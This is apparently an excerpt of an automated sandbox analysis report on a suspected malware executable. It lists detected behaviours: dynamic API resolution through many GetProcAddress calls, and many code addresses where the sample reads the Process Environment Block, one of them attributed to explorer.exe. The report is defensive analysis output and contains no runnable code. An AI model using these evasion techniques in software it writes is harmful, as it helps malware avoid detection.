Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0046D730
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A390AF mov eax, dword ptr fs:[00000030h] 1_2_00A390AF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2F0BF mov ecx, dword ptr fs:[00000030h] 1_2_00A2F0BF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A2F0BF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A2F0BF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9080 mov eax, dword ptr fs:[00000030h] 1_2_009F9080
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A73884 mov eax, dword ptr fs:[00000030h] 1_2_00A73884
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A73884 mov eax, dword ptr fs:[00000030h] 1_2_00A73884
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B02A mov eax, dword ptr fs:[00000030h] 1_2_00A0B02A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77016 mov eax, dword ptr fs:[00000030h] 1_2_00A77016
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77016 mov eax, dword ptr fs:[00000030h] 1_2_00A77016
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77016 mov eax, dword ptr fs:[00000030h] 1_2_00A77016
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC4015 mov eax, dword ptr fs:[00000030h] 1_2_00AC4015
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC4015 mov eax, dword ptr fs:[00000030h] 1_2_00AC4015
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB2073 mov eax, dword ptr fs:[00000030h] 1_2_00AB2073
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1074 mov eax, dword ptr fs:[00000030h] 1_2_00AC1074
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A10050 mov eax, dword ptr fs:[00000030h] 1_2_00A10050
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A10050 mov eax, dword ptr fs:[00000030h] 1_2_00A10050
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A261A0 mov eax, dword ptr fs:[00000030h] 1_2_00A261A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A261A0 mov eax, dword ptr fs:[00000030h] 1_2_00A261A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1C182 mov eax, dword ptr fs:[00000030h] 1_2_00A1C182
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A185 mov eax, dword ptr fs:[00000030h] 1_2_00A2A185
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A841E8 mov eax, dword ptr fs:[00000030h] 1_2_00A841E8
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009FB1E1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009FB1E1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009FB1E1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov eax, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 mov ecx, dword ptr fs:[00000030h] 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2513A mov eax, dword ptr fs:[00000030h] 1_2_00A2513A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2513A mov eax, dword ptr fs:[00000030h] 1_2_00A2513A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9100 mov eax, dword ptr fs:[00000030h] 1_2_009F9100
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9100 mov eax, dword ptr fs:[00000030h] 1_2_009F9100
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9100 mov eax, dword ptr fs:[00000030h] 1_2_009F9100
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1B944 mov eax, dword ptr fs:[00000030h] 1_2_00A1B944
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1B944 mov eax, dword ptr fs:[00000030h] 1_2_00A1B944
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB171 mov eax, dword ptr fs:[00000030h] 1_2_009FB171
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FB171 mov eax, dword ptr fs:[00000030h] 1_2_009FB171
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC962 mov eax, dword ptr fs:[00000030h] 1_2_009FC962
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A0AAB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A0AAB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2FAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A2FAB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2D294 mov eax, dword ptr fs:[00000030h] 1_2_00A2D294
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2D294 mov eax, dword ptr fs:[00000030h] 1_2_00A2D294
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F52A5 mov eax, dword ptr fs:[00000030h] 1_2_009F52A5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A13A1C mov eax, dword ptr fs:[00000030h] 1_2_00A13A1C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAB260 mov eax, dword ptr fs:[00000030h] 1_2_00AAB260
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAB260 mov eax, dword ptr fs:[00000030h] 1_2_00AAB260
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8A62 mov eax, dword ptr fs:[00000030h] 1_2_00AC8A62
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3927A mov eax, dword ptr fs:[00000030h] 1_2_00A3927A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9240 mov eax, dword ptr fs:[00000030h] 1_2_009F9240
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A84257 mov eax, dword ptr fs:[00000030h] 1_2_00A84257
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC5BA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC5BA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB138A mov eax, dword ptr fs:[00000030h] 1_2_00AB138A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAD380 mov ecx, dword ptr fs:[00000030h] 1_2_00AAD380
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A01B8F mov eax, dword ptr fs:[00000030h] 1_2_00A01B8F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A01B8F mov eax, dword ptr fs:[00000030h] 1_2_00A01B8F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2B390 mov eax, dword ptr fs:[00000030h] 1_2_00A2B390
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB131B mov eax, dword ptr fs:[00000030h] 1_2_00AB131B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF358 mov eax, dword ptr fs:[00000030h] 1_2_009FF358
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A23B7A mov eax, dword ptr fs:[00000030h] 1_2_00A23B7A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A23B7A mov eax, dword ptr fs:[00000030h] 1_2_00A23B7A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FDB40 mov eax, dword ptr fs:[00000030h] 1_2_009FDB40
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8B58 mov eax, dword ptr fs:[00000030h] 1_2_00AC8B58
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FDB60 mov ecx, dword ptr fs:[00000030h] 1_2_009FDB60
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0849B mov eax, dword ptr fs:[00000030h] 1_2_00A0849B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB14FB mov eax, dword ptr fs:[00000030h] 1_2_00AB14FB
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A76CF0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A76CF0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A76CF0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8CD6 mov eax, dword ptr fs:[00000030h] 1_2_00AC8CD6
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2BC2C mov eax, dword ptr fs:[00000030h] 1_2_00A2BC2C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC740D mov eax, dword ptr fs:[00000030h] 1_2_00AC740D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC740D mov eax, dword ptr fs:[00000030h] 1_2_00AC740D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC740D mov eax, dword ptr fs:[00000030h] 1_2_00AC740D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AB1C06
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A76C0A mov eax, dword ptr fs:[00000030h] 1_2_00A76C0A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1746D mov eax, dword ptr fs:[00000030h] 1_2_00A1746D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A44B mov eax, dword ptr fs:[00000030h] 1_2_00A2A44B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8C450 mov eax, dword ptr fs:[00000030h] 1_2_00A8C450
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8C450 mov eax, dword ptr fs:[00000030h] 1_2_00A8C450
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A235A1 mov eax, dword ptr fs:[00000030h] 1_2_00A235A1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F2D8A mov eax, dword ptr fs:[00000030h] 1_2_009F2D8A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A2FD9B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A2FD9B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A0D5E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A0D5E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AA8DF1 mov eax, dword ptr fs:[00000030h] 1_2_00AA8DF1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A7A537 mov eax, dword ptr fs:[00000030h] 1_2_00A7A537
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A03D34 mov eax, dword ptr fs:[00000030h] 1_2_00A03D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8D34 mov eax, dword ptr fs:[00000030h] 1_2_00AC8D34
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A24D3B mov eax, dword ptr fs:[00000030h] 1_2_00A24D3B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A24D3B mov eax, dword ptr fs:[00000030h] 1_2_00A24D3B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A24D3B mov eax, dword ptr fs:[00000030h] 1_2_00A24D3B
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FAD30 mov eax, dword ptr fs:[00000030h] 1_2_009FAD30
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1C577 mov eax, dword ptr fs:[00000030h] 1_2_00A1C577
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1C577 mov eax, dword ptr fs:[00000030h] 1_2_00A1C577
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A33D43 mov eax, dword ptr fs:[00000030h] 1_2_00A33D43
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A73540 mov eax, dword ptr fs:[00000030h] 1_2_00A73540
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A17D50 mov eax, dword ptr fs:[00000030h] 1_2_00A17D50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A746A7 mov eax, dword ptr fs:[00000030h] 1_2_00A746A7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC0EA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC0EA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AC0EA5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8FE87 mov eax, dword ptr fs:[00000030h] 1_2_00A8FE87
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A216E0 mov ecx, dword ptr fs:[00000030h] 1_2_00A216E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A076E2 mov eax, dword ptr fs:[00000030h] 1_2_00A076E2
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A38EC7 mov eax, dword ptr fs:[00000030h] 1_2_00A38EC7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAFEC0 mov eax, dword ptr fs:[00000030h] 1_2_00AAFEC0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A236CC mov eax, dword ptr fs:[00000030h] 1_2_00A236CC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8ED6 mov eax, dword ptr fs:[00000030h] 1_2_00AC8ED6
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AAFE3F mov eax, dword ptr fs:[00000030h] 1_2_00AAFE3F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC600 mov eax, dword ptr fs:[00000030h] 1_2_009FC600
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC600 mov eax, dword ptr fs:[00000030h] 1_2_009FC600
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FC600 mov eax, dword ptr fs:[00000030h] 1_2_009FC600
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A61C mov eax, dword ptr fs:[00000030h] 1_2_00A2A61C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A61C mov eax, dword ptr fs:[00000030h] 1_2_00A2A61C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FE620 mov eax, dword ptr fs:[00000030h] 1_2_009FE620
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0766D mov eax, dword ptr fs:[00000030h] 1_2_00A0766D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A1AE73
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A07E41 mov eax, dword ptr fs:[00000030h] 1_2_00A07E41
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77794 mov eax, dword ptr fs:[00000030h] 1_2_00A77794
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77794 mov eax, dword ptr fs:[00000030h] 1_2_00A77794
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A77794 mov eax, dword ptr fs:[00000030h] 1_2_00A77794
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A337F5 mov eax, dword ptr fs:[00000030h] 1_2_00A337F5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2E730 mov eax, dword ptr fs:[00000030h] 1_2_00A2E730
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC070D mov eax, dword ptr fs:[00000030h] 1_2_00AC070D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC070D mov eax, dword ptr fs:[00000030h] 1_2_00AC070D
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A70E mov eax, dword ptr fs:[00000030h] 1_2_00A2A70E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2A70E mov eax, dword ptr fs:[00000030h] 1_2_00A2A70E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F4F2E mov eax, dword ptr fs:[00000030h] 1_2_009F4F2E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F4F2E mov eax, dword ptr fs:[00000030h] 1_2_009F4F2E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A1F716 mov eax, dword ptr fs:[00000030h] 1_2_00A1F716
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A8FF10
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A8FF10
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0FF60 mov eax, dword ptr fs:[00000030h] 1_2_00A0FF60
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC8F6A mov eax, dword ptr fs:[00000030h] 1_2_00AC8F6A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0EF40 mov eax, dword ptr fs:[00000030h] 1_2_00A0EF40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04829080 mov eax, dword ptr fs:[00000030h] 5_2_04829080
